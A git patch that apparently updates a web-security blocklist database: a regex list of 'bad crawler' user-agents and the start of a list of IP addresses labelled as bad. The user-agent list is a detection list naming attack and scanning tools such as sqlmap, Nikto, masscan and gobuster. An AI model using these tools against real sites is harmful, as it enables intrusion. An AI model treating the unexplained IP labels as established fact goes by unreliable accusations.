From 16b26ec2af5f95d741b4b692c84b4b2e6755d0cc Mon Sep 17 00:00:00 2001
From: ghost <ghost@users.noreply.github.com>
Date: Wed, 20 Nov 2024 00:53:43 +0000
Subject: [PATCH] build: Update DB [Wed Nov 20 00:53:43 UTC 2024]

---
 README.md                    |     6 +-
 db/MD5SUMS                   |     7 +
 db/bad-crawlers.txt          |  1411 ++++
 db/bad-ip-addresses.txt      | 14622 +++++++++++++++++++++++++++++++++
 db/bad-referrers.txt         |  7105 ++++++++++++++++
 db/common-web-attacks.json   |     1 +
 db/cves.json                 |     1 +
 db/db.tar.zst                |   Bin 0 -> 553525 bytes
 db/directory-bruteforces.txt |  5339 ++++++++++++
 9 files changed, 28489 insertions(+), 3 deletions(-)
 create mode 100644 db/MD5SUMS
 create mode 100644 db/bad-crawlers.txt
 create mode 100644 db/bad-ip-addresses.txt
 create mode 100644 db/bad-referrers.txt
 create mode 100644 db/common-web-attacks.json
 create mode 100644 db/cves.json
 create mode 100644 db/db.tar.zst
 create mode 100644 db/directory-bruteforces.txt

diff --git a/README.md b/README.md
index cbdf658b..06b51d0c 100644
--- a/README.md
+++ b/README.md
@@ -10,14 +10,14 @@ This collection serves as the primary repository of external resources/datasets
 | -------------------- | --------- |
 | Common Web Attack    | 76      |
 | CVEs                 | 2752      |
-| Bad IP Address       | 14461      |
+| Bad IP Address       | 14622      |
 | Bad Referrer         | 7104      |
 | Bad Crawler          | 1410      |
 | Directory Bruteforce | 5339      |
-|       **Total**      | **31142**      |
+|       **Total**      | **31303**      |
 
 > [!NOTE]
-> Last updated at **Tue Nov 19 00:54:03 UTC 2024**.
+> Last updated at **Wed Nov 20 00:53:43 UTC 2024**.
 
 ## Contributions
 
diff --git a/db/MD5SUMS b/db/MD5SUMS
new file mode 100644
index 00000000..7dc9e69d
--- /dev/null
+++ b/db/MD5SUMS
@@ -0,0 +1,7 @@
+d57cfba30adee8c57aecc4dc95883086  bad-crawlers.txt
+0339d3696f43bf21cedfa25966f1059d  bad-ip-addresses.txt
+8f186aa10b19ce75203890934508f9e1  bad-referrers.txt
+394f8e08f61e118f284f899558f6629f  common-web-attacks.json
+22383afb675d154bfe0ad9ecf48b3cd2  cves.json
+3fc991b7e9263d333426dc144ff384e5  db.tar.zst
+775441f83d82bac371e04f9844375590  directory-bruteforces.txt
diff --git a/db/bad-crawlers.txt b/db/bad-crawlers.txt
new file mode 100644
index 00000000..89d586c8
--- /dev/null
+++ b/db/bad-crawlers.txt
@@ -0,0 +1,1411 @@
+ YLT
+^Aether
+^Amazon Simple Notification Service Agent$
+^Amazon-Route53-Health-Check-Service
+^Amazon CloudFront
+^b0t$
+^bluefish 
+^Calypso v\/
+^COMODO DCV
+^Corax
+^DangDang
+^DavClnt
+^DHSH
+^docker\/[0-9]
+^Expanse
+^FDM 
+^git\/
+^Goose\/
+^Grabber
+^Gradle\/
+^HTTPClient\/
+^HTTPing
+^Java\/
+^Jeode\/
+^Jetty\/
+^Mail\/
+^Mget
+^Microsoft URL Control
+^Mikrotik\/
+^Netlab360
+^NG\/[0-9\.]
+^NING\/
+^npm\/
+^Nuclei
+^PHP-AYMAPI\/
+^PHP\/
+^pip\/
+^pnpm\/
+^RMA\/
+^Ruby|Ruby\/[0-9]
+^Swurl 
+^TLS tester 
+^twine\/
+^ureq
+^VSE\/[0-9]
+^WordPress\.com
+^XRL\/[0-9]
+^ZmEu
+008\/
+13TABS
+192\.comAgent
+2GDPR\/
+2ip\.ru
+404enemy
+7Siters
+80legs
+a3logics\.in
+A6-Indexer
+Abonti
+Aboundex
+aboutthedomain
+Accoona-AI-Agent
+acebookexternalhit\/
+acoon
+acrylicapps\.com\/pulp
+Acunetix
+AdAuth\/
+adbeat
+AddThis
+ADmantX
+AdminLabs
+adressendeutschland
+adreview\/
+adscanner
+adstxt-worker
+Adstxtaggregator
+adstxt\.com
+Adyen HttpClient
+AffiliateLabz\/
+affilimate-puppeteer
+agentslug
+AHC
+aihit
+aiohttp\/
+Airmail
+akka-http\/
+akula\/
+alertra
+alexa site audit
+Alibaba\.Security\.Heimdall
+Alligator
+allloadin
+AllSubmitter
+alyze\.info
+amagit
+Anarchie
+AndroidDownloadManager
+Anemone
+AngleSharp
+annotate_google
+Anthill
+Anturis Agent
+Ant\.com
+AnyEvent-HTTP\/
+Apache Ant\/
+Apache Droid
+Apache OpenOffice
+Apache-HttpAsyncClient
+Apache-HttpClient
+ApacheBench
+Apexoo
+apimon\.de
+APIs-Google
+AportWorm\/
+AppBeat\/
+AppEngine-Google
+AppleSyndication
+Aprc\/[0-9]
+Arachmo
+arachnode
+Arachnophilia
+aria2
+Arukereso
+asafaweb
+Asana\/
+Ask Jeeves
+AskQuickly
+ASPSeek
+Asterias
+Astute
+asynchttp
+Attach
+attohttpc
+autocite
+AutomaticWPTester
+Autonomy
+awin\.com
+AWS Security Scanner
+axios\/
+a\.pr-cy\.ru
+B-l-i-t-z-B-O-T
+Backlink-Ceck
+BacklinkHttpStatus
+BackStreet
+BackupLand
+BackWeb
+Bad-Neighborhood
+Badass
+baidu\.com
+Bandit
+basicstate
+BatchFTP
+Battleztar Bazinga
+baypup\/
+BazQux
+BBBike
+BCKLINKS
+BDFetch
+BegunAdvertising
+Bewica-security-scan
+Bidtellect
+BigBozz
+Bigfoot
+biglotron
+BingLocalSearch
+BingPreview
+binlar
+biNu image cacher
+Bitacle
+Bitrix link preview
+biz_Directory
+BKCTwitterUnshortener\/
+Black Hole
+Blackboard Safeassign
+BlackWidow
+BlockNote\.Net
+BlogBridge
+Bloglines
+Bloglovin
+BlogPulseLive
+BlogSearch
+Blogtrottr
+BlowFish
+boitho\.com-dc
+Boost\.Beast
+BPImageWalker
+Braintree-Webhooks
+Branch Metrics API
+Branch-Passthrough
+Brandprotect
+Brandwatch
+Brodie\/
+Browsershots
+BUbiNG
+Buck\/
+Buddy
+BuiltWith
+Bullseye
+BunnySlippers
+Burf Search
+Butterfly\/
+BuzzSumo
+CAAM\/[0-9]
+CakePHP
+Calculon
+Canary%20Mail
+CaretNail
+catexplorador
+CC Metadata Scaper
+Cegbfeieh
+censys
+centuryb.o.t9[at]gmail.com
+Cerberian Drtrs
+CERT\.at-Statistics-Survey
+cf-facebook
+cg-eye
+changedetection
+ChangesMeter
+Charlotte
+chatterino-api-cache
+CheckHost
+checkprivacy
+CherryPicker
+ChinaClaw
+Chirp\/
+chkme\.com
+Chlooe
+Chromaxa
+CirrusExplorer
+CISPA Vulnerability Notification
+CISPA Web Analyser
+Citoid
+CJNetworkQuality
+Clarsentia
+clips\.ua\.ac\.be
+Cloud mapping
+CloudEndure
+CloudFlare-AlwaysOnline
+Cloudflare-Healthchecks
+Cloudinary
+cmcm\.com
+coccoc
+cognitiveseo
+ColdFusion
+colly -
+CommaFeed
+Commons-HttpClient
+commonscan
+contactbigdatafr
+contentkingapp
+Contextual Code Sites Explorer
+convera
+CookieReports
+copyright sheriff
+CopyRightCheck
+Copyscape
+cortex\/
+Cosmos4j\.feedback
+Covario-IDS
+Craw\/
+Crescent
+Criteo
+Crowsnest
+CSHttp
+CSSCheck
+Cula\/
+curb
+Curious George
+curl
+cuwhois\/
+cybo\.com
+DAP\/NetHTTP
+DareBoost
+DatabaseDriverMysqli
+DataCha0s
+DatadogSynthetics
+Datafeedwatch
+Datanyze
+DataparkSearch
+dataprovider
+DataXu
+Daum(oa)?[ \/][0-9]
+dBpoweramp
+ddline
+deeris
+delve\.ai
+Demon
+DeuSu
+developers\.google\.com\/\+\/web\/snippet\/
+Devil
+Digg
+Digincore
+DigitalPebble
+Dirbuster
+Discourse Forum Onebox
+Dispatch\/
+Disqus\/
+DittoSpyder
+dlvr
+DMBrowser
+DNSPod-reporting
+docoloc
+Dolphin http client
+DomainAppender
+DomainLabz
+Domains Project\/
+Donuts Content Explorer
+dotMailer content retrieval
+dotSemantic
+downforeveryoneorjustme
+Download Wonder
+downnotifier
+DowntimeDetector
+Drip
+drupact
+Drupal \(\+http:\/\/drupal\.org\/\)
+DTS Agent
+dubaiindex
+DuplexWeb-Google
+DynatraceSynthetic
+EARTHCOM
+Easy-Thumb
+EasyDL
+Ebingbong
+ec2linkfinder
+eCairn-Grabber
+eCatch
+ECCP
+eContext\/
+Ecxi
+EirGrabber
+ElectricMonk
+elefent
+EMail Exractor
+EMail Wolf
+EmailWolf
+Embarcadero
+Embed PHP Library
+Embedly
+endo\/
+europarchive\.org
+evc-batch
+EventMachine HttpClient
+Everwall Link Expander
+Evidon
+Evrinid
+ExactSearch
+ExaleadCloudview
+Excel\/
+exif
+ExoRank
+Exploratodo
+Express WebPictures
+Extreme Picture Finder
+EyeNetIE
+ezooms
+facebookcatalog
+facebookexternalhit
+facebookexternalua
+facebookplatform
+fairshare
+Faraday v
+fasthttp
+Faveeo
+Favicon downloader
+faviconarchive
+faviconkit
+FavOrg
+Feed Wrangler
+Feedable\/
+Feedbin
+FeedBooster
+FeedBucket
+FeedBunch\/
+FeedBurner
+feeder
+Feedly
+FeedshowOnline
+Feedshow\/
+Feedspot
+FeedViewer\/
+Feedwind\/
+FeedZcollector
+feeltiptop
+Fetch API
+Fetch\/[0-9]
+Fever\/[0-9]
+FHscan
+Fiery%20Feeds
+Filestack
+Fimap
+findlink
+findthatfile
+FlashGet
+FlipboardBrowserProxy
+FlipboardProxy
+FlipboardRSS
+Flock\/
+Florienzh\/
+fluffy
+Flunky
+flynxapp
+forensiq
+ForusP
+FoundSeoTool
+fragFINN\.de
+free thumbnails
+Freeuploader
+FreshRSS
+frontman
+Funnelback
+Fuzz Faster U Fool
+G-i-g-a-b-o-t
+g00g1e\.net
+ganarvisitas
+gdnplus\.com
+GeedoProductSearch
+geek-tools
+Genieo
+GentleSource
+GetCode
+Getintent
+GetLinkInfo
+getprismatic
+GetRight
+getroot
+GetURLInfo\/
+GetWeb
+Geziyor
+Ghost Inspector
+GigablastOpenSource
+GIS-LABS
+github-camo
+GitHub-Hookshot
+github\.com
+Go http package
+Go [\d\.]* package http
+Go!Zilla
+Go-Ahead-Got-It
+Go-http-client
+go-mtasts\/
+gobuster
+gobyus
+Gofeed
+gofetch
+Goldfire Server
+GomezAgent
+gooblog
+Goodzer\/
+Google AppsViewer
+Google Desktop
+Google favicon
+Google Keyword Suggestion
+Google Keyword Tool
+Google Page Speed Insights
+Google PP Default
+Google Search Console
+Google Web Preview
+Google-Ads
+Google-Adwords
+Google-Apps-Script
+Google-Calendar-Importer
+Google-HotelAdsVerifier
+Google-HTTP-Java-Client
+Google-InspectionTool
+Google-Podcast
+Google-Publisher-Plugin
+Google-Read-Aloud
+Google-SearchByImage
+Google-Site-Verification
+Google-SMTP-STS
+Google-speakr
+Google-Structured-Data-Testing-Tool
+Google-Transparency-Report
+google-xrawler
+Google-Youtube-Links
+GoogleDocs
+GoogleHC\/
+GoogleOther
+GoogleProber
+GoogleProducer
+GoogleSites
+Gookey
+GoSpotCheck
+gosquared-thumbnailer
+Gotit
+GoZilla
+grabify
+GrabNet
+Grafula
+Grammarly
+GrapeFX
+GreatNews
+Gregarius
+GRequests
+grokkit
+grouphigh
+grub-client
+gSOAP\/
+GT::WWW
+GTmetrix
+GuzzleHttp
+gvfs\/
+HAA(A)?RTLAND http client
+Haansoft
+hackney\/
+Hadi Agent
+HappyApps-WebCheck
+Hardenize
+Hatena
+Havij
+HaxerMen
+HeadlessChrome
+HEADMasterSEO
+HeartRails_Capture
+help@dataminr\.com
+heritrix
+Hexometer
+historious
+hkedcity
+hledejLevne\.cz
+Hloader
+HMView
+Holmes
+HonesoSearchEngine
+HootSuite Image proxy
+Hootsuite-WebFeed
+hosterstats
+HostTracker
+ht:\/\/check
+htdig
+HTMLparser
+htmlyse
+HTTP Banner Detection
+http-get
+HTTP-Header-Abfrage
+http-kit
+http-request\/
+HTTP-Tiny
+HTTP::Lite
+http:\/\/www.neomo.de\/
+HttpComponents
+httphr
+HTTPie
+HTTPMon
+httpRequest
+httpscheck
+httpssites_power
+httpunit
+HttpUrlConnection
+http\.rb\/
+HTTP_Compression_Test
+http_get
+http_request2
+http_requester
+httrack
+huaweisymantec
+HubSpot 
+HubSpot-Link-Resolver
+Humanlinks
+i2kconnect\/
+Iblog
+ichiro
+Id-search
+IdeelaborPlagiaat
+IDG Twitter Links Resolver
+IDwhois\/
+Iframely
+igdeSpyder
+iGooglePortal
+IlTrovatore
+Image Fetch
+Image Sucker
+ImageEngine\/
+ImageVisu\/
+Imagga
+imagineeasy
+imgsizer
+InAGist
+inbound\.li parser
+InDesign%20CC
+Indy Library
+InetURL
+infegy
+infohelfer
+InfoTekies
+InfoWizards Reciprocal Link
+inpwrd\.com
+instabid
+Instapaper
+Integrity
+integromedb
+Intelliseek
+InterGET
+Internet Ninja
+InternetSeer
+internetVista monitor
+internetwache
+internet_archive
+intraVnews
+IODC
+IOI
+Inboxb0t
+iplabel
+ips-agent
+IPS\/[0-9]
+IPWorks HTTP\/S Component
+iqdb\/
+Iria
+Irokez
+isitup\.org
+iskanie
+isUp\.li
+iThemes Sync\/
+IZaBEE
+iZSearch
+JAHHO
+janforman
+Jaunt\/
+Java.*outbrain
+javelin\.io
+Jbrofuzz
+Jersey\/
+JetCar
+Jigsaw
+Jobboerse
+JobFeed discovery
+Jobg8 URL Monitor
+jobo
+Jobrapido
+Jobsearch1\.5
+JoinVision Generic
+JolokiaPwn
+Joomla
+Jorgee
+JS-Kit
+JungleKeyThumbnail
+JustView
+Kaspersky Lab CFR link resolver
+Kelny\/
+Kerrigan\/
+KeyCDN
+Keyword Density
+Keywords Research
+khttp\/
+KickFire
+KimonoLabs\/
+Kml-Google
+knows\.is
+KOCMOHABT
+kouio
+kube-probe
+kubectl
+kulturarw3
+KumKie
+Larbin
+Lavf\/
+leakix\.net
+LeechFTP
+LeechGet
+letsencrypt
+Lftp
+LibVLC
+LibWeb
+Libwhisker
+libwww
+Licorne
+Liferea\/
+Lighthouse
+Lightspeedsystems
+Likse
+limber\.io
+Link Valet
+LinkAlarm\/
+LinkAnalyser
+link-check
+linkCheck
+linkdex
+LinkExaminer
+linkfluence
+linkpeek
+LinkPreview
+LinkScan
+LinksManager
+LinkTiger
+LinkWalker
+link_thumbnailer
+Lipperhey
+Litemage_walker
+livedoor ScreenShot
+LoadImpactRload
+localsearch-web
+LongURL API
+longurl-r-package
+looid\.com
+looksystems\.net
+lscache_runner
+ltx71
+lua-resty-http
+Lucee \(CFML Engine\)
+Lush Http Client
+lwp-request
+lwp-trivial
+LWP::Simple
+lycos
+LYT\.SR
+L\.webis
+mabontland
+MacOutlook\/
+Mag-Net
+MagpieRSS
+Mail::STS
+MailChimp
+Mail\.Ru
+Majestic12
+makecontact\/
+Mandrill
+MapperCmd
+marketinggrader
+MarkMonitor
+MarkWatch
+Mass Downloader
+masscan\/
+Mata Hari
+mattermost
+Mediametric
+Mediapartners-Google
+mediawords
+MegaIndex\.ru
+MeltwaterNews
+Melvil Rawi
+MemGator
+Metaspinner
+MetaURI
+MFC_Tear_Sample
+Microsearch
+Microsoft Data Access
+Microsoft Office
+Microsoft Outlook
+Microsoft Windows Network Diagnostics
+Microsoft-WebDAV-MiniRedir
+Microsoft\.Data\.Mashup
+MicrosoftPreview
+MIDown tool
+MIIxpc
+Mindjet
+Miniature\.io
+Miniflux
+mio_httpc
+Miro-HttpClient
+Mister PiX
+mixdata dot com
+mixed-content-scan
+mixnode
+Mnogosearch
+mogimogi
+Mojeek
+Mojolicious \(Perl\)
+Mollie
+monitis
+Monitority\/
+Monit\/
+montastic
+MonTools
+Moreover
+Morfeus Fucking Scanner
+Morning Paper
+MovableType
+mowser
+Mrcgiguy
+Mr\.4x3 Powered
+MS Web Services Client Protocol
+MSFrontPage
+mShots
+MuckRack\/
+muhstik-scan
+MVAClient
+MxToolbox\/
+myseosnapshot
+nagios
+Najdi\.si
+Name Intelligence
+NameFo\.com
+Nameprotect
+nationalarchives
+Navroad
+nbertaupete95
+NearSite
+Needle
+Nessus
+Net Vampire
+NetAnts
+NETCRAFT
+NetLyzer
+NetMechanic
+NetNewsWire
+Netpursual
+netresearch
+NetShelter ContentScan
+Netsparker
+NetSystemsResearch
+nettle
+NetTrack
+Netvibes
+NetZIP
+Neustar WPM
+NeutrinoAPI
+NewRelicPinger
+NewsBlur .*Finder
+NewsGator
+newsme
+newspaper\/
+Nexgate Ruby Client
+NG-Search
+nghttp2
+Nibbler
+NICErsPRO
+NihilScio
+Nikto
+nineconnections
+NLNZ_IAHarvester
+Nmap Scripting Engine
+node-fetch
+node-superagent
+node-urllib
+Nodemeter
+NodePing
+node\.io
+nominet\.org\.uk
+nominet\.uk
+Norton-Safeweb
+Notifixious
+notifyninja
+NotionEmbedder
+nuhk
+nutch
+Nuzzel
+nWormFeedFinder
+nyawc\/
+Nymesis
+NYU
+Observatory\/
+Ocelli\/
+Octopus
+oegp
+Offline Explorer
+Offline Navigator
+OgScrper
+okhttp
+omgili
+OMSC
+Online Domain Tools
+Open Source RSS
+OpenCalaisSemanticProxy
+Openfind
+OpenLinkProfiler
+Openstat\/
+OpenVAS
+OPPO A33
+Optimizer
+Orbiter
+OrgProbe\/
+orion-semantics
+Outlook-Express
+Outlook-iOS
+Owler
+Owlin
+ownCloud News
+ow\.ly
+OxfordCloudService
+page scorer
+Page Valet
+page2rss
+PageFreezer
+PageGrabber
+PagePeeker
+PageScorer
+Pagespeed\/
+PageThing
+page_verifier
+Panopta
+panscient
+Papa Foto
+parsijoo
+Pavuk
+PayPal IPN
+pcBrowser
+Pcore-HTTP
+PDF24 URL To PDF
+Pearltrees
+PECL::HTTP
+peerindex
+Peew
+PeoplePal
+Perlu -
+PhantomJS Screenshoter
+PhantomJS\/
+Photon\/
+php-requests
+phpservermon
+Pi-Monster
+Picscout
+Picsearch
+PictureFinder
+Pimonster
+Pingability
+PingAdmin\.Ru
+Pingdom
+Pingoscope
+PingSpot
+ping\.blo\.gs
+pinterest\.com
+Pixray
+Pizilla
+Plagger\/
+Pleroma 
+Ploetz \+ Zeller
+Plukkie
+plumanalytics
+PocketImageCache
+PocketParser
+Pockey
+PodcastAddict\/
+POE-Component-Client-HTTP
+Polymail\/
+Pompos
+Porkbun
+Port Monitor
+postano
+postfix-mta-sts-resolver
+PostmanRuntime
+postplanner\.com
+PostPost
+postrank
+PowerPoint\/
+Prebid
+Prerender
+Priceonomics Analysis Engine
+PrintFriendly
+PritTorrent
+Prlog
+probely\.com
+probethenet
+Project ?25499
+Project-Resonance
+prospectb2b
+Protopage
+ProWebWalker
+proximic
+PRTG Network Monitor
+pshtt, https scanning
+PTST 
+PTST\/[0-9]+
+pulsetic\.com
+Pump
+Python-httplib2
+python-httpx
+python-requests
+Python-urllib
+Qirina Hurdler
+QQDownload
+QrafterPro
+Qseero
+Qualidator
+QueryN Metasearch
+queuedriver
+quic-go-HTTP\/
+QuiteRSS
+Quora Link Preview
+Qwantify
+Radian6
+RadioPublicImageResizer
+Railgun\/
+RankActive
+RankFlex
+RankSonicSiteAuditor
+RapidLoad\/
+Re-re Studio
+ReactorNetty
+Readability
+RealDownload
+RealPlayer%20Downloader
+RebelMouse
+Recorder
+RecurPost\/
+redback\/
+ReederForMac
+Reeder\/
+ReGet
+RepoMonkey
+request\.js
+reqwest\/
+ResponseCodeTest
+RestSharp
+Riddler
+Rival IQ
+Robosourcer
+Robozilla
+ROI Hunter
+RPT-HTTPClient
+RSSMix\/
+RSSOwl
+RuxitSynthetic
+RyowlEngine
+safe-agent-scanner
+SalesIntelligent
+Saleslift
+SAP NetWeaver Application Server
+SauceNAO
+SBIder
+sc-downloader
+scalaj-http
+Scamadviser-Frontend
+ScanAlert
+scan\.lol
+Scoop
+scooter
+ScopeContentAG-HTTP-Client
+ScoutJet
+ScoutURLMonitor
+ScrapeBox Page Scanner
+Scrapy
+Screaming
+ScreenShotService
+Scrubby
+Scrutiny\/
+Search37
+searchenginepromotionhelp
+Searchestate
+SearchExpress
+SearchSight
+SearchWP
+search\.thunderstone
+Seeker
+semanticdiscovery
+semanticjuice
+Semiocast HTTP client
+Semrush
+Sendsay\.Ru
+sentry\/
+SEO Browser
+Seo Servis
+seo-nastroj\.cz
+seo4ajax
+Seobility
+SEOCentro
+SeoCheck
+seocompany
+SEOkicks
+SEOlizer
+Seomoz
+SEOprofiler
+seoscanners
+SEOsearch
+seositecheckup
+SEOstats
+servernfo
+sexsearcher
+Seznam
+Shelob
+Shodan
+Shoppimon
+ShopWiki
+ShortLinkTranslate
+shortURL lengthener
+shrinktheweb
+Sideqik
+Siege
+SimplePie
+SimplyFast
+Siphon
+SISTRIX
+Site Sucker
+Site-Shot\/
+Site24x7
+SiteBar
+Sitebeam
+Sitebulb\/
+SiteCondor
+SiteExplorer
+SiteGuardian
+Siteimprove
+SiteIndexed
+Sitemap(s)? Generator
+SitemapGenerator
+SiteMonitor
+Siteshooter B0t
+SiteSnagger
+SiteSucker
+SiteTruth
+Sitevigil
+sitexy\.com
+SkypeUriPreview
+Slack\/
+sli-systems\.com
+slider\.com
+slurp
+SlySearch
+SmartDownload
+SMRF URL Expander
+SMUrlExpander
+Snake
+Snappy
+SnapSearch
+Snarfer\/
+SniffRSS
+sniptracker
+Snoopy
+SnowHaze Search
+sogou web
+SortSite
+Sottopop
+sovereign\.ai
+SpaceBison
+SpamExperts
+Spammen
+Spanner
+Spawning-AI
+spaziodati
+SPDYCheck
+Specificfeeds
+SpeedKit
+speedy
+SPEng
+Spinn3r
+spray-can
+Sprinklr 
+spyonweb
+sqlmap
+Sqlworm
+Sqworm
+SSL Labs
+ssl-tools
+StackRambler
+Statastico\/
+Statically-
+StatusCake
+Steeler
+Stratagems Kumo
+Stripe\/
+Stroke\.cz
+StudioFACA
+StumbleUpon
+suchen
+Sucuri
+summify
+SuperHTTP
+Surphace Scout
+Suzuran
+swcd 
+Symfony BrowserKit
+Symfony2 BrowserKit
+Synapse\/
+Syndirella\/
+SynHttpClient-Built
+Sysomos
+sysscan
+Szukacz
+T0PHackTeam
+tAkeOut
+Tarantula\/
+Taringa UGC
+TarmotGezgin
+tchelebi\.io
+techiaith\.cymru
+Teleport
+Telesoft
+Telesphoreo
+Telesphorep
+Tenon\.io
+teoma
+terrainformatica
+Test Certificate Info
+testuri
+Tetrahedron
+TextRazor Downloader
+The Drop Reaper
+The Expert HTML Source Viewer
+The Intraformant
+The Knowledge AI
+theinternetrules
+TheNomad
+Thinklab
+Thumbor
+Thumbshots
+ThumbSniper
+timewe\.net
+TinEye
+Tiny Tiny RSS
+TLSProbe\/
+Toata
+topster
+touche\.com
+Traackr\.com
+tracemyfile
+Trackuity
+TrapitAgent
+Trendiction
+Trendsmap
+trendspottr
+truwoGPS
+TryJsoup
+TulipChain
+Turingos
+Turnitin
+tweetedtimes
+Tweetminster
+Tweezler\/
+twibble
+Twice
+Twikle
+Twingly
+Twisted PageGetter
+Typhoeus
+ubermetrics-technologies
+uclassify
+UdmSearch
+ultimate_sitemap_parser
+unchaos
+unirest-java
+UniversalFeedParser
+unshortenit
+Unshorten\.It
+Untiny
+UnwindFetchor
+updated
+updown\.io daemon
+Upflow
+Uptimia
+URL Verifier
+Urlcheckr
+URLitor
+urlresolver
+Urlstat
+URLTester
+UrlTrends Ranking Updater
+URLy Warning
+URLy\.Warning
+URL\/Emacs
+Vacuum
+Vagabondo
+VB Project
+vBSEO
+VCI
+Verity
+via ggpht\.com GoogleImageProxy
+Virusdie
+visionutils
+Visual Rights Group
+vkShare
+VoidEYE
+Voil
+voltron
+voyager\/
+VSAgent\/
+VSB-TUO\/
+Vulnbusters Meter
+VYU2
+w3af\.org
+W3C-checklink
+W3C-mobileOK
+W3C_Unicorn
+WAC-OFU
+WakeletLinkExpander
+WallpapersHD
+Wallpapers\/[0-9]+
+wangling
+Wappalyzer
+WatchMouse
+WbSrch\/
+WDT\.io
+Web Auto
+Web Collage
+Web Enhancer
+Web Fetch
+Web Fuck
+Web Pix
+Web Sauger
+Web spyder
+Web Sucker
+web-capture\.net
+Web-sniffer
+Webalta
+Webauskunft
+WebAuto
+WebCapture
+WebClient\/
+webcollage
+WebCookies
+WebCopier
+WebCorp
+WebDataStats
+WebDoc
+WebEnhancer
+WebFetch
+WebFuck
+WebGazer
+WebGo IS
+WebImageCollector
+WebImages
+WebIndex
+webkit2png
+WebLeacher
+webmastercoffee
+webmon 
+WebPix
+WebReaper
+WebSauger
+webscreenie
+Webshag
+Webshot
+Website Quester
+websitepulse agent
+WebsiteQuester
+Websnapr
+WebSniffer
+Webster
+WebStripper
+WebSucker
+webtech\/
+WebThumbnail
+Webthumb\/
+WebWhacker
+WebZIP
+WeLikeLinks
+WEPA
+WeSEE
+wf84
+Wfuzz\/
+wget
+WhatCMS
+WhatsApp
+WhatsMyIP
+WhatWeb
+WhereGoes\?
+Whibse
+WhoAPI\/
+WhoRunsCoinHive
+Whynder Magnet
+Windows-RSS-Platform
+WinHttp-Autoproxy-Service
+WinHTTP\/
+WinPodder
+wkhtmlto
+wmtips
+Woko
+Wolfram HTTPClient
+woorankreview
+WordPress\/
+WordupinfoSearch
+Word\/
+worldping-api
+wotbox
+WP Engine Install Performance API
+WP Rocket
+wpif
+wprecon\.com survey
+WPScan
+wscheck
+Wtrace
+WWW-Collector-E
+WWW-Mechanize
+WWW::Document
+WWW::Mechanize
+WWWOFFLE
+www\.monitor\.us
+x09Mozilla
+x22Mozilla
+XaxisSemanticsClassifier
+XenForo\/
+Xenu Link Sleuth
+XING-contenttabreceiver
+xpymep([0-9]?)\.exe
+Y!J-[A-Z][A-Z][A-Z]
+Yaanb
+yacy
+Yahoo Link Preview
+YahooCacheSystem
+YahooMailProxy
+YahooYSMcm
+YandeG
+Yandex(?!Search)
+yanga
+yeti
+Yo-yo
+Yoleo Consumer
+yomins\.com
+yoogliFetchAgent
+YottaaMonitor
+Your-Website-Sucks
+yourls\.org
+YoYs\.net
+YP\.PL
+Zabbix
+Zade
+Zao
+Zapier
+Zauba
+Zemanta Aggregator
+Zend\\Http\\Client
+Zend_Http_Client
+Zermelo
+Zeus 
+zgrab
+ZnajdzFoto
+ZnHTTP
+Zombie\.js
+Zoom\.Mac
+ZoteroTranslationServer
+ZyBorg
+[a-z0-9\-_]*(bot|crawl|archiver|transcoder|spider|uptime|validator|fetcher|cron|checker|reader|extractor|monitoring|analyzer|scraper)
\ No newline at end of file
diff --git a/db/bad-ip-addresses.txt b/db/bad-ip-addresses.txt
new file mode 100644
index 00000000..ba209434
--- /dev/null
+++ b/db/bad-ip-addresses.txt
@@ -0,0 +1,14622 @@
+1.11.62.200
+1.180.219.212
+1.180.230.98
+1.180.97.138
+1.193.163.2
+1.194.160.101
+1.197.78.123
+1.201.162.20
+1.202.113.45
+1.202.115.35
+1.202.118.170
+1.202.223.2
+1.212.225.99
+1.214.197.163
+1.215.240.130
+1.219.125.68
+1.22.180.245
+1.220.64.218
+1.223.74.121
+1.227.83.100
+1.228.168.90
+1.231.222.19
+1.231.222.20
+1.231.222.21
+1.231.222.22
+1.231.222.23
+1.231.222.24
+1.231.222.25
+1.231.222.26
+1.231.222.27
+1.231.222.28
+1.231.222.29
+1.232.29.63
+1.234.31.117
+1.234.62.237
+1.235.192.131
+1.238.106.229
+1.245.207.104
+1.245.241.62
+1.247.155.239
+1.251.13.72
+1.253.28.16
+1.255.147.123
+1.255.147.86
+1.26.70.70
+1.27.171.154
+1.28.192.150
+1.28.80.2
+1.28.87.246
+1.28.87.38
+1.30.20.98
+1.31.80.166
+1.31.80.222
+1.31.87.230
+1.34.100.72
+1.34.107.46
+1.34.111.115
+1.34.122.186
+1.34.126.178
+1.34.145.215
+1.34.146.59
+1.34.160.57
+1.34.164.40
+1.34.175.135
+1.34.2.141
+1.34.209.79
+1.34.212.100
+1.34.212.207
+1.34.232.138
+1.34.239.180
+1.34.247.157
+1.34.253.240
+1.34.254.21
+1.34.254.82
+1.34.40.99
+1.34.43.114
+1.34.52.67
+1.34.58.99
+1.34.6.132
+1.34.65.133
+1.34.76.241
+1.34.9.93
+1.34.90.127
+1.34.94.21
+1.36.245.47
+1.55.163.150
+1.55.33.86
+1.64.207.72
+1.65.133.35
+1.70.125.31
+1.70.158.32
+1.82.135.154
+1.82.161.53
+1.82.217.54
+1.92.115.219
+1.94.101.90
+100.0.161.38
+100.29.192.1
+100.29.192.10
+100.29.192.100
+100.29.192.102
+100.29.192.106
+100.29.192.107
+100.29.192.108
+100.29.192.109
+100.29.192.110
+100.29.192.112
+100.29.192.12
+100.29.192.120
+100.29.192.121
+100.29.192.125
+100.29.192.127
+100.29.192.13
+100.29.192.15
+100.29.192.16
+100.29.192.17
+100.29.192.18
+100.29.192.23
+100.29.192.25
+100.29.192.27
+100.29.192.38
+100.29.192.39
+100.29.192.40
+100.29.192.42
+100.29.192.48
+100.29.192.49
+100.29.192.55
+100.29.192.56
+100.29.192.60
+100.29.192.62
+100.29.192.63
+100.29.192.66
+100.29.192.67
+100.29.192.7
+100.29.192.74
+100.29.192.78
+100.29.192.8
+100.29.192.81
+100.29.192.82
+100.29.192.84
+100.29.192.85
+100.29.192.88
+100.29.192.91
+100.29.192.94
+100.29.192.95
+100.29.192.98
+100.40.206.220
+100.42.178.193
+101.100.184.80
+101.109.196.57
+101.126.11.137
+101.126.11.251
+101.126.143.162
+101.126.143.163
+101.126.143.177
+101.126.144.74
+101.126.149.19
+101.126.158.69
+101.126.16.175
+101.126.17.129
+101.126.18.31
+101.126.20.192
+101.126.21.209
+101.126.21.63
+101.126.23.102
+101.126.24.74
+101.126.29.183
+101.126.31.21
+101.126.4.215
+101.126.4.240
+101.126.5.109
+101.126.54.167
+101.126.54.66
+101.126.54.88
+101.126.55.179
+101.126.55.63
+101.126.6.108
+101.126.6.243
+101.126.64.251
+101.126.65.104
